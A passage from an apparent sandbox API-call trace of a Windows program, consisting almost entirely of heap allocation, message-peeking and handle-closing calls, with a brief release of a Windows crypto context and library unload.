(in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0221.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0221.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0221.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0221.966] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0221.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0221.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0221.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0221.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0221.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0221.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0221.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0221.968] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0221.968] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0221.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0221.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0221.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0221.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0221.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0221.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0221.969] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0221.969] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0221.969] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0221.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0221.969] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.969] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.969] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.969] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0221.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0221.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0221.970] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.970] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0221.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0221.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0221.970] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.970] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0221.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0221.970] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.970] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0221.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0221.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.970] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.970] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.970] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0221.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0221.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0221.971] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.971] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0221.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0221.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0221.971] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.971] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0221.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0221.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0221.971] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0221.972] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.972] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0221.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0221.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0221.972] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.972] FreeLibrary (hLibModule=0x756e0000) returned 1 [0221.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0221.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0221.972] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0221.972] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0221.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0221.972] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0221.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0221.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0221.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0221.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0221.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0221.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0221.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0221.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0221.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0221.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0221.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0221.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0221.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0221.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0221.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0221.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0221.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0221.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0221.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0221.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0221.973] CloseHandle (hObject=0x2d0) returned 1 [0221.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0221.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0221.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0221.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0221.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0221.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0221.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0221.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0221.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0221.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0221.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0221.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0221.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0221.979] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0221.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0221.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0221.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0221.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0221.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0221.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0221.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0221.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d58 [0221.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0221.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0221.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0221.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0221.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0221.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0221.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0221.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0221.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0221.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0221.981] CloseHandle (hObject=0x2a0) returned 1 [0221.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0221.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0221.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0222.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0222.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0222.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0222.074] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0222.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0222.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0222.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0222.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0222.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0222.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0222.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0222.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0222.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0222.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 